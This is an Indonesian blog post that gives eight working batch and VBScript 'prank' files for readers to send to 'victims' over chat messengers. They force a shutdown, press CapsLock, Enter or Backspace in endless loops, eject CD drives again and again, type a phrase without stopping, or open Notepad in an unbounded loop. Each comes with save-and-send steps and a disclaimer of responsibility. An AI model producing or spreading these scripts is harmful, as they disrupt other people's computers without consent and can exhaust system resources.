Reborn

Reborn The Art Of Design Blog | Created By Cah Purbalingga

Cebok


ShoutMix chat widget

Reborn On Facebook

Follow Us

Bikin Profil Facebookmu Lebih Keren Di Photoshop!

gampang banget,langsung aja di simak tutorialnya :D

Melacak Profile Facebook Seseorang dengan Mudah

Udah deh langsung intip aja tutornya :D

Cara Termudah Mengganti Warna Mobil Tanpa Hue Effect

bila kita mengganti warna sebuah object kita cenderung memakai teknik hue/saturation kan? tapi kenapa gak pengin nyoba cara yang lebih simpel lagi? pantengin tutornya disni!

Hilangkan Jerawat Dengan Sempurna

Yang jerawatnya banyak intip aja yuk :D

Ganti Warna Rambut dan Baju di Photoshop

Ayo semir rambut gratis di Photoshop mau warna apa aja bisa! just click away :D



















selamat sore semuanya ,, ane mw sedikit berbagi ilmu nih :D mudah"an aja bermanfaat (atau ambil manfaatnya) disini ane kaga ada maksud buruk atau apapun itu, ane cm mau berbagi ilmu saja gan jadi segala bentuk resiko dan tindakan anda, itu diluar tanggung jawab ane

pengiriman file bisa via yahoo Messenger, MSN, GoogleTalk, Skype dan semua fasilitas chat messenger yang mendukung pengiriman file

1. shut down

@echo off
msg * I don't like you
shutdown -c "Error! You are too ******!" -s
Simpan dengan nama file : terserah_agan.BAT ,, type file : All File dan kirimkan
efeknya adalah saat korban menerima file kiriman agan,
maka komputernya otomatis FORCED SHUTDOWN


2. caplok
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop
Simpan dengan nama file : terserah_agan.VBS ,, type file : All File dan kirimkan
efeknya adalah saat korban menerima file kiriman agan, maka tombol CAPSLOCK kibornya akan terus menyala
(bila agan matikan maka tombolnya otomatis nyala lagi)


3. Cd pop

Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop

Simpan dengan nama file : terserah_agan.VBS ,, type file : All File dan kirimkan
efeknya adalah saat korban menerima file kiriman agan, maka CD Drive korban akan pop out (bhsa indonesianya apa ya ??) terus menerus ,,,
(bila agan matikan maka tombolnya otomatis nyala lagi)


4. enter eject

Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop


Simpan dengan nama file : terserah_agan.VBS ,, type file : All File dan kirimkan
efeknya adalah saat korban menerima file kiriman agan, maka tombol ENTER korban akan nyala terus menerus


5. How Are you

WScript.Sleep 180000
WScript.Sleep 10000
Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.Run "notepad"
WScript.Sleep 100
WshShell.AppActivate "Notepad"
WScript.Sleep 500
WshShell.SendKeys "Hel"
WScript.Sleep 500
WshShell.SendKeys "lo "
WScript.Sleep 500
WshShell.SendKeys ", ho"
WScript.Sleep 500
WshShell.SendKeys "w a"
WScript.Sleep 500
WshShell.SendKeys "re "
WScript.Sleep 500
WshShell.SendKeys "you"
WScript.Sleep 500
WshShell.SendKeys "? "
WScript.Sleep 500
WshShell.SendKeys "I a"
WScript.Sleep 500
WshShell.SendKeys "m g"
WScript.Sleep 500
WshShell.SendKeys "ood"
WScript.Sleep 500
WshShell.SendKeys " th"
WScript.Sleep 500
WshShell.SendKeys "ank"
WScript.Sleep 500
WshShell.SendKeys "s! "

Simpan dengan nama file : terserah_agan.VBS ,, type file : All File dan kirimkan
efeknya adalah otomatis membuka notepad korban dan akan muncul tulisan "Hello, how are you? I am good thanks" secara SLOW MOTION
kalimat "Hello, how are you? I am good thanks" ,, bisa agan rubah sesuai selera, tinggal ubah saja frase kata dalam tanda kutip di syntax diatas

6. Backjspace Attack
MsgBox "Let's go back a few steps"
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{bs}"
loop

Simpan dengan nama file : terserah_agan.VBS ,, type file : All File dan kirimkan
efeknya adalah mirip dengan cara ke 4, syntax yang ini akan menekan tombol BACKSPACE korban terus menerus


7. Nurdin
Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "Aku Berlindung Kepada Allah SWT Dari Godaan Nurdin Halid Yang Terkutuk !!."
loop
Simpan dengan nama file : terserah_agan.VBS ,, type file : All File dan kirimkan
efeknya adalah, kibord korban akan otomatis menuliskan kalimat "Aku Berlindung Kepada Allah SWT Dari Godaan Nurdin Halid Yang Terkutuk !!."
secara terus menerus, dalam format pengetikan apapun
"Aku Berlindung Kepada Allah SWT Dari Godaan Nurdin Halid Yang Terkutuk !!."

8. Notepad

@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top

Simpan dengan nama file : terserah_agan.BAT ,, type file : All File dan kirimkan
efeknya adalah saat korban menerima file kiriman agan, maka komputer korban akan menghidupkan perintah notepad.exe terus menerus






Semoga bermanfaat,selamat berjail jail :D



sumber

2 Responses so far.

  1. Anonim says:

    terus cara balikin nya gimana?
    cara ngentiin semua perintah diatas?

  2. ThanXz Bget gan ,.,,.
    Q perLu BlaJar Bnyak Dri Maz Enu Nech,.,..,..,,

Leave a Reply